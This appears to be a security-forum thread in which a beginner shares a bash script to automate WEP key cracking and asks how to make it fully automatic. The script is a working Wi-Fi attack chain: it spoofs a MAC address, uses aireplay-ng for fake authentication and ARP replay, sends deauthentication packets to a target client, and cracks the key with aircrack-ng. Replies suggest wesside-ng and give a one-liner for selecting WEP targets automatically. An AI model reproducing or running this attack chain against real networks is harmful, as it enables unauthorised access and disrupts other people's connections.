Thread: semi auto WEP with station script....need advice..

Hybrid View

Just burned his ISO

Red face semi auto WEP with station script....need advice..

hi. 1st sorry about my english, i'm asian

(fresh bt4 vm + edimark 7318usg)
    my script like:-

Code:
    #!/bin/bash
    device=wlan0
    driver=rt73usb
    fake=00:11:22:33:44:55
    enc=1

airmon-ng stop $device
    ifconfig $device down
    rmmod $driver
    modprobe $driver
    macchanger --mac 00:11:22:33:44:55 $device
    iwconfig $device mode monitor
    ifconfig $device up
    airmon-ng start $device
    airmon-ng stop mon0
    sudo rm *.txt
    sudo rm *.cap
    sudo rm *.sh~
    sudo rm *.arp-request
    sudo rm *.ivs
    sudo rm *.xor
    sudo rm *.csv
    clear

echo ""
    echo "      ___________________________________________________  "
    echo "     |                                                   | "
    echo "     | chose your target, write down the ESSID,BSSID,ENC | "
    echo "     | CH,and STATION. Once done close 'MONITOR' konsole | "
    echo "     | and follow the instruction... have a nice day :-) | "
    echo "     |___________________________________________________| "
    echo ""

konsole -T MONITOR --noclose -e airodump-ng $device

echo ""
    read -p  "  A. CHANNEL (CH).......................?  " ch
    read -p  "  B. ESSID..............................?  " essid
    read -p  "  C. BSSID   xx:xx:xx:xx:xx:xx .........?  " bssid
    read -p  "  D. STATION xx:xx:xx:xx:xx:xx .........?  " station
    echo ""

if [ $enc = 1 ]
    then
    airmon-ng start $device $ch
    airmon-ng stop mon0

iwconfig $device rate 1M

konsole -T table-A --noclose -e airodump-ng -c $ch --write key --bssid $bssid $device &
    sleep 3
     konsole -T table-B --noclose -e aireplay-ng -1 6000 -q 10 -o 1 -a $bssid -e $essid -h $fake $device &
    sleep 10
     konsole -T table-C --noclose -e aireplay-ng -3 -b $bssid -e $essid -h $fake $device &
    sleep 10
    konsole -T table-FLASH -e aireplay-ng -0 50 -a $bssid -c $station -h $fake $device &
    sleep 15
    clear
    echo "    please wait.........   "
    echo "    do not close any konsole until you got thr password at table-D  "
    sleep 30
            konsole -T table-D -e aircrack-ng key-01.cap
    clear
    echo ""
    echo "  :-) "
    exit
    fi
    any advice how to change to fully auto, mean
    i dont want write down the input..just want chose the AP and client mac on the list
    Code:
         choose your AP target

esssid        enc
          a. aztech1       (wep)   1
          b. aztech2       (wpa)   2
          c. aztech3       (opn)   3

chose your client

essid       station
              aztech1     xx:xx:xx:xx:xx:xx   1
                          xx:xx:xx:xx:xx:xx   2
                          xx:xx:xx:xx:Xx:xx   3
    then script auto run.
    my imagine is
    save any data when "MONITOR" run and recall back the data when "MONITOR" closed, how to make this script hapend..

Very good friend of the forum Gitsnik's Avatar

Quote Originally Posted by mael4704 View Post
    how to make this script hapend..
    wesside-ng, wepbuster, or one of a hundred others. I applaud your starting to make use of scripting tech for this sort of thing, but I suggest you apply your skills elsewhere.

If you insist on not, why not look into transferring information around via sockets, named pipes or even just based on the logging information out of the airodump created .txt files with grep.

I have a script around somewhere that airodump's, identifies a wep network and then runs wesside-ng against it - it's just a tail command attached to a grep and a while loop: tail airodump.log | grep WEP | grep OPN | while read BSSIDLINE; do blah; done
    Still not underestimating the power...

There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.

Just burned his ISO

Quote Originally Posted by Gitsnik View Post
    wesside-ng, wepbuster, or one of a hundred others. I applaud your starting to make use of scripting tech for this sort of thing, but I suggest you apply your skills elsewhere.

If you insist on not, why not look into transferring information around via sockets, named pipes or even just based on the logging information out of the airodump created .txt files with grep.

I have a script around somewhere that airodump's, identifies a wep network and then runs wesside-ng against it - it's just a tail command attached to a grep and a while loop: tail airodump.log | grep WEP | grep OPN | while read BSSIDLINE; do blah; done
    thanks for reply..
    i get my skills just on google only..
    computer, window arroud 1 year and linux(bt3&4) just 8 month, i'm so new on "this wold"

nevermine
    u mean tail airodump.log | grep WEP | grep OPN | while read BSSIDLINE; do blah; done is part of script ?? seriously im noob...

my script alreddy finish for wep with client & no client on fragment/chop2 and interactive attack at cople off week

now i try make it fully auto..thnk for advice

Honestly, this isn't really where you need to be if you're noobish to all this stuff, the distro isn't really for you.

However, yes I did mean that part was a script - a bash script the same as you.
    Quote Originally Posted by mael4704 View Post
    now i try make it fully auto..thnk for advice
    wesside-ng *is* fully auto - the only reason I use the bash script I made pseudo-mention of above is because even the 1.0 version of wesside-ng sometimes tries to attack WPA networks when it shouldn't.

Theoretically you should be able to just type "wesside-ng -i interface" and it will attack any WEP network in range - in practice you need to link airodump together with it so that you may process the channel and BSSID out to ensure wesside operates correctly.

I strongly recommend you go and have a play with wesside-ng and learn it properly - it will save you a lot of time. Plus, the lack of duplication of code means you have a central point of "known good" when you are debugging the code you write to go around these tools.

There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.

Just burned his ISO omegadamage's Avatar

Default Hmm

Think you should look into my scripts and forget all other LOL as they can be fuddled up if you know what I mean! Sorry Gitsnik mael4704 should learn a more stream lined script. More self explanatory and formed easier to learn at first and yes I am making my way back up the script kitty ladder to challenge you LOL.

Omegadamage

Quote Originally Posted by omegadamage View Post
    Sorry Gitsnik mael4704 should learn a more stream lined script.
    Oh I agree. It's just so... devastating... to see so many people... waste... talent on re-inventing the wheel (or the wep-script) when they could be investing time in other things.

Hell, how many scripts do you know of that are capable of SKA as well? Let's see some more of those at least! But, unfortunately, one is continually subjected to an almost endless stream of talent being put to little use and less innovation. It is a shame to see so many of my/this generation doing this - not that my own contributions are massive, but I like to think they are, at least, new and/or innovative - or at least fill a gap.

But now I sound like a pontificating old man rather than a twenty something programmer, so I better leave this here